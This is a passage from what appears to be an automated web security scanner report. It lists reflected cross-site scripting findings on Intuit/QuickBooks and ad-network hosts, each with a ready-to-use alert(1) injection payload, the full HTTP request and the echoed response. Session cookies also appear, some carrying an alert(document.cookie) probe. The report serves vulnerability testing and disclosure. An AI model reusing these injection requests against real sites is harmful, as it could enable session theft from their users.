This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.womensforum39b71'-alert(1)-'f79a09b6d14/;sz=300x250;net=cm;ord=[timestamp];ord1=541263;cmpgurl=http%253A//www.highbeam.com/iframead/display.aspx%253Fsite%253Dgale.hbr.doc%2526zone%253Dp5554%2526kvps%253Dpage%253Dwall%253Bcat%253Dhbr_99%253Bpub%253Dp5554%253Bpos%253Dr2%253Bchannel%253D1000000025%253Bsz%253D300x250%252C300x600%253Btile%253D2%253Bord%253D19528853%253B%2526id%253Dad-r2c6cce%252522%25253balert%25281%2529//c18ae8de3b0? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(1)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 21 Mar 2011 16:42:22 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:22 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:22 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 00:42:22 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 22-Mar-2011 16:42:22 GMT
Content-Length: 9535

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-14336886_1300725742","http://ib.adnxs.com/ptj?member=311&inv_code=cm.womensforum39b71'-alert(1)-'f79a09b6d14&size=300x250&referrer=http%3A%2F%2Fwww.highbeam.com%2Fiframead%2Fdisplay.aspx%3Fsite%3Dgale.hbr.doc%26zone%3Dp5554%26kvps%3Dpage%3Dwall%3Bcat%3Dhbr_99%3Bpub%3Dp5554%3Bpos%3Dr2%3Bchannel%3D1000000025%3
...[SNIP]...

2.34. https://login.quickbooks.com/j/qbn/auth/employee [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.quickbooks.com
Path:	/j/qbn/auth/employee

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 727a9<script>alert(1)</script>391eb828edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /j/qbn/auth727a9<script>alert(1)</script>391eb828edb/employee?service_flags=0&url=https%3A//accounting.quickbooks.com/qbo HTTP/1.1
Host: login.quickbooks.com
Connection: keep-alive
Referer: http://www.infocustech.net/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:18:32 GMT
Server: Web Server
Content-Length: 80
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

Unknown page /ctol/j/qbn/auth727a9<script>alert(1)</script>391eb828edb/employee

2.35. http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox.offermatica.intuit.com
Path:	/m2/intuit/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 24e9e<script>alert(1)</script>b6e4e102f9b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/intuit/mbox/standard?mboxHost=quickbooks.intuit.com&mboxSession=1300724385027-792520&mboxPage=1300724385027-792520&mboxCount=2&mbox=qb_header_nav_styles24e9e<script>alert(1)</script>b6e4e102f9b&mboxId=0&mboxTime=1300706388899&mboxURL=http%3A%2F%2Fquickbooks.intuit.com%2F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: mbox.offermatica.intuit.com
Proxy-Connection: keep-alive
Referer: http://quickbooks.intuit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; SHOPPER_USER_ID=2848631086; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; mbox=check#true#1300724446|session#1300724385027-792520#1300726246|PC#1300724385027-792520.17#1303316389

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Mon, 21 Mar 2011 16:20:15 GMT
Server: Test & Target

mboxFactories.get('default').get('qb_header_nav_styles24e9e<script>alert(1)</script>b6e4e102f9b',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1300724385027-792520.17");

2.36. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into a JavaScript rest-of-line comment. The payload 5917f%0aalert(1)//0f2714cf68b was submitted in the bas parameter. This input was echoed as 5917f
alert(1)//0f2714cf68b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=card5917f%0aalert(1)//0f2714cf68b HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=um+gvySdzc86szkJlLldjw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E2A450A0805192AA117E3E34C4700
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161486


...[SNIP]...
cked',true);
            }
        if(selectedServiceIndicator == "selected_check_service_id_3")
        {
               //$("#selected_check_service_id_3").attr('checked',true);
        }

       }
       //var bas = 'card5917f
alert(1)//0f2714cf68b';
    //var parameterString1="changeInService=alreadyHvScanner&bas="+bas+"&category=changeInService&categoryType=7";
    //invokeAJAX(parameterString1);
   }


   function processResponse(respo
...[SNIP]...

2.37. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into an HTML comment. The payload d670a--><script>alert(1)</script>afe168cf1c was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardd670a--><script>alert(1)</script>afe168cf1c HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kH34osQKwEbdp4qaYa77bg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E11310A0805192AA117E3E38F36B5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161643

...[SNIP]...
<input type="radio" id="is_existing_merchant_true" name="is_existing_merchant" value="true" onclick="setMerchantFlag('true','cardd670a--><script>alert(1)</script>afe168cf1c');" />
...[SNIP]...

2.38. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>c5a639cbe3e was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardfbd42"><script>alert(1)</script>c5a639cbe3e HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=6X7mnOxDx5FEMyyRLsH-gg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E8D0A0805192AA117E3F1EDA955
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161658

...[SNIP]...
<input type="radio" id="in_quickbooks_true" name="process_payment_type" value="true" onclick="changeMSCFlag('true','cardfbd42"><script>alert(1)</script>c5a639cbe3e');" />
...[SNIP]...

2.39. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100cc'%3balert(1)//21604655727 was submitted in the uaenv parameter. This input was echoed as 100cc';alert(1)//21604655727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod100cc'%3balert(1)//21604655727&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=euYdvJzwS0vhcYVatmDW7w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:16 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C195D0A0805192AA117E38C4A9C75
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460


...[SNIP]...
tedHardwareId);
       var bas;
       if(initialSelectedSolution != undefined && initialSelectedSolution != '')
       {
           bas = initialSelectedSolution;
       }
if(UAenv == null)
{
           UAenv = 'prod100cc';alert(1)//21604655727';
}
       if(UAenv == "null" || UAenv == null)
       {
           UAenv = "prod";
       }
       var return_url = 'http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp' + "?requestType=rtnFromUA&uaenv
...[SNIP]...

2.40. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5165"%3balert(1)//11b088fde41 was submitted in the uaenv parameter. This input was echoed as c5165";alert(1)//11b088fde41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prodc5165"%3balert(1)//11b088fde41&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Mpqqf8aOaufCGZGLg+D68Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95BBAA80A0805192AA117E3BFDAC659
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460


...[SNIP]...

var ua_selected_add_on_service_ids;
var ua_available_add_on_services_ids;
var ua_selected_hardware_ids;
var ua_selected_hardware_own_type;

var ua_selected_card_service_id;

var UAenv = "prodc5165";alert(1)//11b088fde41";

var mandatory_card_name;
var mandatory_card_id;

var selectedCardMap;
var records;


$(document).ready(function()
{
       requestType = 'rtnFromUA';
       bas = 'card';
       sbweb.util.log.
...[SNIP]...

2.41. http://quickbooks.intuit.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooks.intuit.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34696"-alert(1)-"66a292e8db4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?34696"-alert(1)-"66a292e8db4=1 HTTP/1.1
Host: quickbooks.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:19:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=OToy1OqmVZg+yQHERbOVTg**.g126-2; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848618735; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:56:25 GMT; Path=/
Set-Cookie: abTestId=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: abTestGroup=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: abTestPriorityCode=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: originalABTestPriorityCode=null; Domain=.quickbooks.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: splitABTestPriorityCode=null; Domain=.quickbooks.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: userSegmentation=null; Domain=.quickbooks.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: abTestId=0000000000002223720; Domain=.intuit.com; Expires=Thu, 18-Mar-2021 16:19:24 GMT; Path=/
Set-Cookie: abTestGroup=T9; Domain=.intuit.com; Expires=Thu, 18-Mar-2021 16:19:24 GMT; Path=/
Set-Cookie: abTestPriorityCode=0273400000; Domain=.intuit.com; Expires=Thu, 18-Mar-2021 16:19:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=quickbooks.intuit.com; Path=/
x-wily-info: Clear guid=D936B3520A080598789AD0AFB3911242
